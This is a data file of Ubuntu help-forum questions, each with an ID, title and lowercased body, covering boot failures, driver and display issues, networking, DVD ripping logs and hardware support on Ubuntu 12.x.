239711	i get a black screen trying to boot live cd on macbook pro	i 've been trying to boot into ubuntu using both a dvd and a usb stick . they both work on my desktop computer , but not on my macbook pro ( 8,2 ) . i can get them to show up in the boot menu , and i get to an ascii menu where i can try ubuntu , go straight to installation , or check for defects ( there 's a 4th option i ca n't remember ) . but when i choose to try ubuntu , it just goes to a black screen . i can hear the dvd reading for a few minutes , then it stops . if i hit enter , it starts reading from the dvd again . this makes be think it 's booting , but the display drivers are n't working . what can i do ?
239714	ubuntu does n't recognize itself	i installed ubuntu in trial mode . grub was n't installed properly , so i reinstalled windows and now it gives me the option to choose between os . however , when i try to install ubuntu , it says that `` this computer has multiple operating systems running on it '' , when it 's only windows 7 and ubuntu ! what can i do ? it only allows me to use it in trial mode .
239717	what document scanner should i buy ?	i 'm searching for a scanner which helps me to turn my invoces and other random papers into pdfs . i need linux support because i do not own a windows/linux device and using a virtual machine is not a solution . a automated document feeder ( adf ) is necessary . whether the device consists only of a adf or is a combination of a adf with a flatbed is not that important , i would go for the second solution if i have the choice . i thought about the canonc p-215 , but i was not able to check its linux support . the sane device list does not mention this scanner .
239719	what package should i install for driver of the atheros ar8161 ethernet controller without net ?	i 've read in this question that a new package exists for this driver . but i am confused . there are a lot of packages and i do n't know which one do i need . i have a dellvostro-3460 , ubuntu 12.10 , kernel 3.5.0-17-generic . thanks for any help .
239721	nvidia geforce 8600 gt resolution 640x480	just installed ubuntu 12.10 , i has 1024x768 resolution at first , than i add ppa sudo apt-add-repository ppa : xorg-edgers/ppa get update sudo apt-get update and install driver sudo apt-get install nvidia-current nvidia-settings now i have 640x480 maximum . how do i fix this ? i 'm newbie in ubuntu , also not native english speaker , sorry for poor language and halp me , please .
239723	how i can acess grub menu of ubuntu 10.04 ?	my grub menu vanished , and i can not access it with left shift . when i press the left shift i see opening grub and then the desktop menu . i need it urgently because i lost my password .
239727	why am i not able to update ubuntu ?	not able to update ubuntu even after cleaning with update and upgrade commands and henceforth not able to install softwares . when i try i get the error w : failed to fetch ubuntuarchive.hnsdc.com/ubuntu/dists/precise-security/main/i18n/âś unable to connect to ubuntuarchive.hnsdc.com : http :
239734	nautilus - bypass trash by default	the title says it all . i know i can do shift delete to remove files bypassing the trash . what i want , is to just hit delete and bypass the trash by default . shift delete should be to remove to trash .
239741	firefox asks me to download json file containing the search results each time google	i have flashgot plugin running in firefox , each time i google , firefox asks me to download a json file containing the search results , i do n't know if this is a firefox issue or flashgot or what !
239742	my mouse is detecing every button as button 1 , what can i do ?	i have corsair vengeance m60 mouse ( usb ) , and it seems to be having issues in ubuntu . basically , it detects movement and detects button clicks , well , sort-of . i put it through `` xinput test '' and every button i press ( all of them seperately ) return as being mouse button 1 . so they all left click no matter what i press , and i ca n't remap because they all seem to think they 're the same mouse button . any ideas ? ubuntu 12.10 by the way : )
239743	problem with update 12.04	i have 12.04 lts but i have a strange problem from a while every time i try to do an update an error window apears with `` check your internet connection '' and i have tried to update file by file which was boring and very not exciting finally i found 4 files those was the problem libproxy1 ( size : 57kb ) libproxy1-plugin-gsettings ( size : 22kb ) libproxy1-plugin-networkmanager ( size :7kb ) python-libproxy ( size:5kb ) by the way i tries to change the server and this problem still the same please give a way to end this problem because every time i need to update i have to look for those files and excludes them from the update ... . try to look for them into 170 files ( i did )
239745	grub rescue , no xp option	i tried to install ubuntu on a pc for a friend that sometimes freezes up in windows xp . ( my thinking was that if it freezes up in ubuntu then it is a hardware problem . ) just nearly finished installing alongside xp and it froze up and had to push the button . i was unable to login to the ubuntu installation , it did not show a proper login screen and was unresponsive . so then using ubcd4windows i deleted the main big ubuntu partition . one problem is that xp did not show up at all as a boot option after that failed ubuntu installation attempt . if i could get into xp again perhaps i could delete the ubuntu partitions ? also have a big xp problem because i replaced a dead motherboard and made rescue dvds but they wont work unless motherboard is tattooed .
239747	ubuntu persistent liveusb mac	i made a bootable live usb drive with ubuntu 11.10 with the help of penguintosh , which uses an efi bootloader that loads the iso of the operating system . is there anyway to make this installation persistent ? or is there another way that i can install ubuntu live usb for mac without refit ( i want to be able to use it on numerous computers ) that can make it persistent ? thanks !
239748	unable to rip dvd using handbrake or ogmrip	i just got my kids some new dvds , but i am trying to rip them and back them up , since i know they are rough with their discs , and i want to have backups in case the discs become scratched . however , i am unable to get either handbrake or ogmrip to rip the disc , closing down in error . i already made a symlinc from /dev/sr0 to /dev/dvd , i also installed regionset in case the region was wrong ( it was n't ) . i am stumped . could someone take a look at the output of handbrakecli and tell me what 's wrong ? thanks a bunch in advance ! handbrakecli -i /dev/sr0 -o brave.mp4 [ 16:19:57 ] hb_init : starting libhb thread handbrake 0.9.8 ( 2012102600 ) - linux x86_64 - http : //handbrake.fr 2 cpus detected opening /dev/sr0 ... [ 16:19:57 ] hb_scan : path=/dev/sr0 , title_index=1 libbluray/bdnav/index_parse.c:157 : indx_parse ( ) : error opening /dev/sr0/bdmv/index.bdmv libbluray/bluray.c:1471 : nav_get_title_list ( /dev/sr0 ) failed ( 0x7fd878000900 ) [ 16:19:57 ] bd : not a bd - trying as a stream/file instead [ 16:19:57 ] dvd : region mask 0xf7 libdvdnav : using dvdnav version 4.1.3 libdvdread : using libdvdcss version 1.2.12 for dvd access libdvdnav : dvd title : brave libdvdnav : dvd serial number : 412e6dd2 libdvdnav : dvd title ( alternative ) : brave libdvdnav : unable to find map file '/home/alberto/.dvdnav/brave.map' libdvdnav : dvd disk reports itself with region mask 0x00f60000 . regions : 1 4 libdvdread : attempting to retrieve all css keys libdvdread : this can take a _long_ time , please be patient libdvdread : get key for /video_ts/video_ts.vob at 0x000001ff libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_01_1.vob at 0x000005cf libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_02_1.vob at 0x000005ed libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_03_1.vob at 0x0000063c libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_04_0.vob at 0x0000087e libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_04_1.vob at 0x00035cdb libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_05_0.vob at 0x0000087e libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_05_1.vob at 0x00035cdb libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_06_0.vob at 0x0000087e libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_06_1.vob at 0x00035cdb libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_07_0.vob at 0x0000087e libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_07_1.vob at 0x00035cdb libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_08_0.vob at 0x0000087e libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_08_1.vob at 0x00035cdb libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_09_0.vob at 0x00309c86 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_09_1.vob at 0x0030a0be libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_10_1.vob at 0x0030d482 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_11_0.vob at 0x0030fc31 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_11_1.vob at 0x0031a1e8 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_12_1.vob at 0x00325600 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_13_1.vob at 0x00326b3d libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_14_1.vob at 0x00326b3d libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_15_1.vob at 0x00326b3d libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_16_1.vob at 0x00326b3d libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_17_1.vob at 0x0035df16 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_18_1.vob at 0x0035df16 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_19_1.vob at 0x0035df16 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_20_1.vob at 0x0035df16 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_21_0.vob at 0x0038bb9e libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_21_1.vob at 0x0038bc21 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_22_0.vob at 0x003eeea5 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_22_1.vob at 0x003eef15 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_23_1.vob at 0x003eef2e libdvdread : elapsed time 0 libdvdread : found 23 vts's libdvdread : elapsed time 0 libdvdread : using libdvdcss version 1.2.12 for dvd access [ 16:19:57 ] scan : dvd has 99 title ( s ) [ 16:19:57 ] scan : scanning title 1 [ 16:19:57 ] scan : opening ifo for vts 1 [ 16:19:57 ] scan : duration is 00:00:00 ( 76 ms ) [ 16:19:57 ] pgc_id : 1 , pgn : 1 : pgc : 0x7fd87801f730 [ 16:19:57 ] scan : vts=1 , ttn=1 , cells=0- > 0 , blocks=0- > 15 , 16 blocks [ 16:19:57 ] scan : title 1 has 1 chapters [ 16:19:57 ] scan : chap 1 c=0- > 0 , b=0- > 15 ( 16 ) , 76 ms [ 16:19:57 ] scan : aspect = 0 [ 16:19:57 ] scan : decoding previews for title 1 libdvdnav : dvd disk reports itself with region mask 0x00f60000 . regions : 1 4 libdvdnav : decoder.c : [ warning , unknown bits : 1000000000080000 ] libdvdnav : decoder.c : [ warning , unknown bits : 1000000000000000 ] [ 16:19:57 ] scan : title angle ( s ) 1 [ 16:19:58 ] scan : 10 previews , 720x480 , 29.970 fps , autocrop = 0/0/0/0 , aspect 4:3 , par 8:9 [ 16:19:58 ] scan : title ( 0 ) job- > width:640 , job- > height:480 [ 16:19:58 ] libhb : scan thread found 1 valid title ( s ) + title 1 : + vts 1 , ttn 1 , cells 0- > 0 ( 16 blocks ) + duration : 00:00:00 + size : 720x480 , pixel aspect : 8/9 , display aspect : 1.33 , 29.970 fps + autocrop : 0/0/0/0 + chapters : + 1 : cells 0- > 0 , 16 blocks , duration 00:00:00 + audio tracks : + subtitle tracks : [ 16:19:58 ] 1 job ( s ) to process [ 16:19:58 ] starting job [ 16:19:58 ] height out of bounds , scaling down to 480 [ 16:19:58 ] new dimensions 640 * 480 [ 16:19:58 ] sync : expecting 2 video frames [ 16:19:58 ] job configuration : [ 16:19:58 ] * source [ 16:19:58 ] + /dev/sr0 [ 16:19:58 ] + title 1 , chapter ( s ) 1 to 1 [ 16:19:58 ] * destination [ 16:19:58 ] + brave.mp4 [ 16:19:58 ] + container : mpeg-4 ( .mp4 and .m4v ) [ 16:19:58 ] * video track [ 16:19:58 ] + decoder : mpeg2 [ 16:19:58 ] + bitrate 9800 kbps [ 16:19:58 ] + frame rate : same as source ( around 29.970 fps ) [ 16:19:58 ] + dimensions : 720 * 480 - > 640 * 480 , crop 0/0/0/0 , mod 0 [ 16:19:58 ] + encoder : mpeg-4 ( ffmpeg ) [ 16:19:58 ] + bitrate : 1000 kbps , pass : 0 [ 16:19:58 ] dvd : region mask 0xf7 libdvdnav : using dvdnav version 4.1.3 libdvdread : using libdvdcss version 1.2.12 for dvd access libdvdnav : dvd title : brave libdvdnav : dvd serial number : 412e6dd2 libdvdnav : dvd title ( alternative ) : brave libdvdnav : unable to find map file '/home/alberto/.dvdnav/brave.map' libdvdnav : dvd disk reports itself with region mask 0x00f60000 . regions : 1 4 libdvdread : attempting to retrieve all css keys libdvdread : this can take a _long_ time , please be patient libdvdread : get key for /video_ts/video_ts.vob at 0x000001ff libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_01_1.vob at 0x000005cf libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_02_1.vob at 0x000005ed libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_03_1.vob at 0x0000063c libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_04_0.vob at 0x0000087e libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_04_1.vob at 0x00035cdb libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_05_0.vob at 0x0000087e libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_05_1.vob at 0x00035cdb libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_06_0.vob at 0x0000087e libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_06_1.vob at 0x00035cdb libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_07_0.vob at 0x0000087e libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_07_1.vob at 0x00035cdb libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_08_0.vob at 0x0000087e libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_08_1.vob at 0x00035cdb libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_09_0.vob at 0x00309c86 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_09_1.vob at 0x0030a0be libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_10_1.vob at 0x0030d482 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_11_0.vob at 0x0030fc31 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_11_1.vob at 0x0031a1e8 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_12_1.vob at 0x00325600 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_13_1.vob at 0x00326b3d libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_14_1.vob at 0x00326b3d libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_15_1.vob at 0x00326b3d libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_16_1.vob at 0x00326b3d libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_17_1.vob at 0x0035df16 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_18_1.vob at 0x0035df16 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_19_1.vob at 0x0035df16 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_20_1.vob at 0x0035df16 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_21_0.vob at 0x0038bb9e libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_21_1.vob at 0x0038bc21 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_22_0.vob at 0x003eeea5 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_22_1.vob at 0x003eef15 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_23_1.vob at 0x003eef2e libdvdread : elapsed time 0 libdvdread : found 23 vts's libdvdread : elapsed time 0 libdvdread : using libdvdcss version 1.2.12 for dvd access libdvdnav : dvd disk reports itself with region mask 0x00f60000 . regions : 1 4 libdvdnav : decoder.c : [ warning , unknown bits : 1000000000080000 ] libdvdnav : decoder.c : [ warning , unknown bits : 1000000000000000 ] [ 16:19:58 ] reader : first scr 146 id 0xe0 dts 22254 [ 16:19:58 ] reader : done . 1 scr changes [ 16:19:58 ] encavcodecinit : mpeg-4 asp encoder [ 16:19:58 ] mpeg2 : `` '' ( 1 ) at frame 0 time 3003 [ 16:19:58 ] sync : first pts is 3003 [ 16:19:58 ] work : average encoding speed for job is 0.000000 fps [ 16:19:58 ] mux : track 0 , 12 frames , 5065 bytes , 101.20 kbps , fifo 16 muxing : this may take awhile ... [ 16:19:58 ] sync : got 12 frames , 2 expected [ 16:19:58 ] mpeg2 done : 12 frames [ 16:19:58 ] render : lost time : 0 ( 0 frames ) [ 16:19:58 ] render : gained time : 0 ( 0 frames ) ( 0 not accounted for ) [ 16:19:58 ] libhb : work result = 0 encode done ! handbrake has exited .
239754	when i try to install ubuntu on my mac , the option to install alongside mac osx does not appear	i 've been trying for days now to install ubuntu 12.04.1 lts on my mac but it does not give me the option to install it alongside my mac osx . the only options available are to replace mac osx or partition manually , which i have tried and tried to do but i have no clue what i am doing , and there is no easy to follow guide on how to do it . i have at least 20g on my hd that i reserved for ubuntu , and i do n't understand why the option does n't appear . help !
239755	lubuntu taskbar problem with x2go	i have a box with ubuntu 12.04 installed and then the lxde and lubuntu-desktop packages were installed . when accessing the box with x2go , suspending the session and returning , the taskbar is mostly blank . it has the faded grey decoration and the network manager symbol . if i click on it , the windows that were open to restore and the launcher buttons mostly work however clicking where the menu should be does nothing . if i connect to the same box using lxde as the client instead ( startlxde instead of startlubuntu ) i do n't have this problem . any idea what could be causing the problem ? update : i also noticed that after reconnecting to a suspended x2go session , alt-f2 does n't work either
239767	how do i delete cached password for encrypted volume ?	i am novice ubuntu user . for laughs i encrypted an external usb drive and put a punch of secret stuff on it . it used to be that every-time i would attach the drive i would be challenged for a password . at some point i inadvertently clicked `` remember password '' and now the volume mounts automagically . how can i remove the cached password so i will be asked for a password each time i mount the volume ? thanks !
239772	how can i convert an android app to an app for ubuntu for phones ?	how can i change from commercially developed app ( xxx.apk ) for android phone ( ex , galaxys , galaxynexus , etc ) to app for phone installed ubutun os ? ( how can i change android apk to app that can be used in ubuntu phone ? ) - once ubuntu for phone is installed , it is automatically changed ? or it is needed any other tool or procedure . - if tool is needed , let me know tool name and procedures . plz send user manual too .
239773	how do i find the maintenance status of programs in the software center ?	how do i find out if a particular program in the `` software center '' is still being maintained ?
239775	how do i remove or hide extra icons from gnome-3 shell ?	when i open the applications menu in gnome shell it lists everything i have installed including command line tools like bash and aptitude . most of the gui applications ( chrome , libre office etc . ) have two icons each , and one is low resolution . how do i remove or hide the icons which should not be there ? i have tried sudo update-menus and it does not work . i am running : ubuntu 12.04 gnome shell 3.4.1
239777	how to connect internet across a static ip network ?	i 'm using ubuntu 10.04 but without internet at home . the reason i think is i have changed my network connections recently to static ip from dhcp because gnuradio needs static ip for accessing external hardware . since then it works in college and i ca n't access internet at home . my ifconfig eth0 result comes like below : eth0 link encap : ethernet hwaddr f0:4d : a2:86:5f:0c inet addr:192.168.1.100 bcast:192.168.1.255 mask:255.255.255.0 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:28 base address:0xa000 my cat /etc/network/interfaces output comes like this : auto eth0 iface eth0 inet static address 192.168.1.100 netmask 255.255.255.0 network 192.168.1.0 broadcast 192.168.1.255 gateway 192.168.1.1 how can i make it work at home with static ip ?
239787	xf86wakeup keys - where do they come from ?	$ head -1 /etc/issue & & emacs -- version | head -1 ubuntu 12.04.1 lts \n \l gnu emacs 23.3.1 from time to time i get undefined messages in the echo area ( that do not show up in buffer *messages* ) about xf86wakeup . in fact , i c-h led to see that there are 22 such < xf86wakeup > keys in a row . reading how do i prevent the sleep button from locking the screen i figured out that the blue fn-key left to ctrl does this . on the other hand , that very same key is needed to enable the soundoff meaning of esc , and similar for f1-f12 . just to make this clear : emacs gets esc directly . thus , esc does not mean soundoff within emacs . but fn-esc does . so what is the clean way to fix this without affecting the other fn keycombinations within emacs ?
239790	show window from another display	from this question , i learned that i ca n't move windows between displays . but , can i show the contents of the window on another display somehow ? do n't move it , but duplicate the output . on the bumblebee website is stated that it launches a second x server and uses virtualgl to show the output of this second server on the other . could n't this approach be applied to classic x windows ?
239792	how to install and use ubuntu from a usb flash drive on windows 8 ?	i 'd like to fully install ubuntu 12.10 onto a 16gb usb 3.0 flash drive , not create a liveusb , but to treat the flash drive as an external hard drive . i 've read it 's possible and i know my computer can boot from it . however , it does n't work when i try . i 've booted a liveusb from another flash drive and installed ubuntu onto the 16gb one . it finished successfully , but when i try to boot from it and it takes me straight to windows 8 instead . i feel i 've done something when installing the boot loader . it 'd be great if i had some step-by-step instructions for : how many partitions to make , what kind , how big , and where to install the boot loader .
239794	internal microphone not working in laptop ms-6837d with ubuntu 12.10	i cant use the microphone in my ubuntu 12.10 . i do n't know at all what it the reason . my sound settings input tab displays some device , but i am not sure if that is my microphone . i use the skype test call to test if the mic is working but i never hear my voice . why i ca n't use my microphone ? what is missing ? update i tried also to use pavucontrol this is how my settings there look like : the second image looks like the mic is taking input , but it is not . that bar is there just shaking and is always the same lenght . i do n't know what it could be . i just noticed that in this link https : //wiki.ubuntu.com/laptoptestingteam/msi % 20x320 ? highlight= % 28 % 5cbcategorylaptop % 5cb % 29 it says that in msi laptops the mic does'nt work . is there any way to fix it ? here is my part of my hardware configuration : computer processor 2x amd athlon ( tm ) x2 dual-core ql-60 memory 3791mb ( 913mb used ) operating system ubuntu 12.10 user name username ( username ) date/time sat 12 jan 2013 00:35:23 gmt display resolution 1366x768 pixels opengl renderer unknown x11 vendor the x.org foundation multimedia audio adapter hda-intel - hda nvidia input devices lid switch sleep button power button power button at translated set 2 keyboard ene ehome infrared remote receiver mce ir keyboard/mouse ( ene_ir ) video bus video bus synps/2 synaptics touchpad hda nvidia line hda nvidia mic hda nvidia headphone hda nvidia line out printers no printers found scsi disks ata wdc wd3200bevt-2 tsstcorp cddvdw ts-l633a operating system version kernel linux 3.5.0-21-generic ( x86_64 ) compiled # 32-ubuntu smp tue dec 11 18:51:59 utc 2012 c library unknown default c compiler gnu c compiler version 4.7.2 ( ubuntu/linaro 4.7.2-2ubuntu1 ) distribution ubuntu 12.10 board name ms-1671 vendor msi
239800	ca n't connect to wifi and apt-get does n't work	i 've seen a ton of answers to fix my broadcom bcm4312 . however , all of them require apt-get in the terminal . for whatever reason , anything involving apt-get wo n't work . it just errors out with unable to locate package [ package ] forgive me if this is an easy question ; i just downloaded ubuntu today . edit : i do have internet connection when using an ethernet cord .
239802	how can i speed up my mouse ?	i have a trackball and it takes me 4 strokes of my thumb to go from one side of the screen to the other even though the speed setting is at max . i added xset m 200 1 to my startup apps , but recently it stopped auto-starting . i have to manually enter this command in terminal is the a way to set this speed without this workaround ? thank you for the help
239803	how to download iso for windows defender offline tool from ubuntu ?	i 'm trying to download an iso of the windows defender offline tools ( http : //windows.microsoft.com/en-ca/windows/what-is-windows-defender-offline ) to run on a relative 's windows pc . i 'm running ubuntu 12.10 . so the download at that page gives you a download utility which in turn actually downloads the application to burn somewhere . when i run the installer in wine i get a message about needing imapi v2 but i 'm not finding much on where or how to get that . does anyone know a direct download of the iso for the windows defender offline tool , or how i might run this thing in ubuntu so that i can burn it to a cd ? thanks , edit : i realize , yes , the tool is intended to run on windows . my ultimate goal is i would like to be able to burn the iso of windows defender offline . i do n't have a windows pc , but my family member does have an infected windows pc . the download on the page is n't the actual installer , it 's a downloader tool . so you run that , and it goes out and pulls down the actual wdo application and burns it to a cd , usb key , or lets you save the iso . what i 'm looking for is either a way to run the downloader tool within ubuntu to get the iso , or a direct download link to the wdo image in the first place .
239809	empathy does n't show properly on indicator menu ( 12.10 )	whenever i get a message on facebook or gtalk , a bubble pops in the upper right corner , and i hear a sound . but , the message icon does n't turn blue , and no `` new messages '' or such is displayed . besides , status in the indicator is always at `` disconnected '' http : //i46.tinypic.com/8wxk76.png `` a message just arrived , the indicator did n't turn blue , and no messages are waiting . besides , empathy stands desconectado ''
239810	how to fix resolution after upgrading lubuntu 12.04 to 12.10 ?	i have been using lubuntu 12.04 , at resolution 1440x900 . then i got rawtherapee , but it would not work right . so i ran a live lubuntu 12.10 and the resolution was at 1440x900 . so i up-graded to 12.10 and now i can not get above 1024x768 . puppy 5.28 automatic see 1024x768 . my card is nvidia gt440 . i looked at the nvidia x server settings menu and it said : you do not appear to be running the nvidia driver . so i ran nvidia-xconfig . now i got a xorg.conf file . did not have one before , but the live lubuntu 12.10 did not have a xorg.conf and it ran ok. nvidia x server said : you do not appear to be running the nvidia driver . where is `` additional drivers '' in lubuntu ? before i installed the drivers in lubuntu 12.04 . but i do not remember how i did it . output of dpkg -1 nvidia-\* : barry @ barry-m68mt-s2p : ~ $ dpkg -l nvidia-\* desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version architecture description +++-==============-============-============-================================= un nvidia-173 < none > ( no description available ) un nvidia-173-upd < none > ( no description available ) un nvidia-180-mod < none > ( no description available ) un nvidia-185-mod < none > ( no description available ) un nvidia-96 < none > ( no description available ) un nvidia-96-upda < none > ( no description available ) un nvidia-common < none > ( no description available ) ii nvidia-current 304.51.reall i386 nvidia binary xorg driver , kernel un nvidia-current < none > ( no description available ) un nvidia-current < none > ( no description available ) un nvidia-experim < none > ( no description available ) un nvidia-libvdpa < none > ( no description available ) un nvidia-libvdpa < none > ( no description available ) un nvidia-libvdpa < none > ( no description available ) un nvidia-libvdpa < none > ( no description available ) ii nvidia-setting 304.51-0ubun i386 tool for configuring the nvidia g un nvidia-setting < none > ( no description available ) un nvidia-setting < none > ( no description available ) un nvidia-setting < none > ( no description available ) un nvidia-vdpau-d < none > ( no description available ) barry @ barry-m68mt-s2p : ~
239812	commanding desktop cube to unfold causes freeze	whenever i enter the key command to unfold the desktop cube ( configured in ccsm 0.9.5.92 on ubuntu 12.04 ) with any command combination ( so i 'm not sure if this is the common cmnd-alt-down issue ) does n't simply cause ccsm to crash , it freezes up my entire computer . any suggestions ? thanks .
239813	remove associated app data without removing the app	i am new to ubuntu , having used windows and mac for many , many years . i have looked but have n't found an answer to the problem in the title . i am trying to remove all configuration data associated with the app gwibber without uninstalling it but i would like to know the general procedure for any app . i am on ubuntu 12.10 on a 64-bit system .
239815	where to find quickly web cam widget ?	according to this page on developer.ubuntu.com , ( third paragraph second sentence ) , there is a quickly web cam widget , where do i find it ? tried googling but only found quickly widgets .
239817	usb becomes unreadable after putting the .img on it-mac	i am trying to put ubuntu on my usb to install it on my macbook pro , but after following step 8 of this ubuntu guide it becomes unreadable and it does n't show up while rebooting my computer and holding alt . a message pops up that says `` the disk you inserted was not readable by this computer . '' directly after i finish the 8th step how do i get my usb to become readable so i can test ubuntu on my computer ?
239822	how to identify and replace broken files in a corrupted ubuntu iso ?	so , this is n't exactly an issue running ubuntu , but rather with installing it . every time i try to download the ubuntu iso ( from any source ) it seems to end up corrupt . that is , the md5 sums are never correct . the ubuntu iso files come with a file that lists all the files in the iso , and their respective md5sums . what i wish to do is loop over this file , and compare them to their files in the iso , and work out what files are corrupt , in the hopes that i can extract the corrupt files from one of the other iso files , to create a working installer . but , i do n't know how to do this , and of course , to make it worse , i have to do this from windows 7 . does anyone know how to fix this ?
239823	use laptop trackpad as graphics tablet	i 'm interested in using my laptop trackpad as a drawing tablet , i.e . using absolute rather than relative coordinates , similar to inklet for osx . the same question was asked in ubuntuforums.org in may 2010 , but the question was never answered . i 'm wondering if this has been done on linux . i 'm also trying to figure out which search terms to use . i searched for 'linux laptop touchpad absolute mode ' , and came up with an issue with track pad drivers which put the trackpad in absolute mode . but i 'm really looking for a program which uses the absolute positions rather than a driver setting .
239824	files disappear when removing pendrive	system updated the next day booted by the kernel that was installed . based on a tutorial , i tried to burn the iso image of the arch linux on a usb key using the command `` sudo dd '' . having problems , formatted the flash drive and could not write files to it . i tried changing the permissions and ownership of the folder where it was mounted , but got no success . since then , every time i save files on a flash drive - tested with several different usb sticks that work perfectly in other operating systems - necessary to run the command `` sync '' , otherwise the changes are discarded to remove the device . how to solve this problem ? already , thanks to all !
239825	after update `` the disk drive / is not ready yet or not present ? ''	i 've been messing around and i feel like i 'm just opening a can a of worms . not sure if i 'm getting closer to solution and i feel like i 'm just discovering more problems and i 'm not sure where to start . i got a dpkg error and couldnt fix that a uuid error i do n't think i 'm connected to the internet when i 'm not in one of the os . i 'm freaked out because i ca n't access a major portion of the drive and this is the only place with pics of my kid . yeah i know do n't scold me please .
239827	how do i enable bluetooth on my lenovo ideapad z580 ?	i have a lenovo ideapad z580 with a built-in bluetooth adapter running ubuntu 12.10 . it seems i ca n't enable it . it works fine in windows 7 , but in ubuntu the option to enable it in the upper right corner seems not to work . in the settings it says it 's off and if i flip the switch to enable it nothing happens . everything remains grayed out and 'bluetooth disabled ' message remains there . i also installed the blueman applet and it does n't find any adapters . any thoughts about getting my bluetooth enabled ? below is some more hardware information . killswitch status : rfkill list 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no 1 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : no 2 : phy0 : wireless lan soft blocked : no hard blocked : no kernel messages : dmesg | grep -i bluetooth [ 3.559047 ] bluetooth : core ver 2.16 [ 3.559067 ] bluetooth : hci device and connection manager initialized [ 3.559068 ] bluetooth : hci socket layer initialized [ 3.559070 ] bluetooth : l2cap socket layer initialized [ 3.559073 ] bluetooth : sco socket layer initialized [ 3.570059 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 3.570062 ] bluetooth : bnep filters : protocol multicast [ 3.573063 ] bluetooth : rfcomm tty layer initialized [ 3.573068 ] bluetooth : rfcomm socket layer initialized [ 3.573069 ] bluetooth : rfcomm ver 1.11 hci command-line tools : hcitool dev devices : ( yes blank ) hciconfig < comes up blank > usb devices : lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 003 device 002 : id 04f2 : b2e1 chicony electronics co. , ltd bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 0bda:0139 realtek semiconductor corp. card reader bus 001 device 004 : id 04ca:2003 lite-on technology corp. lsusb -v | grep blue could n't open device , some information will be missing ( this line was repeated several times )
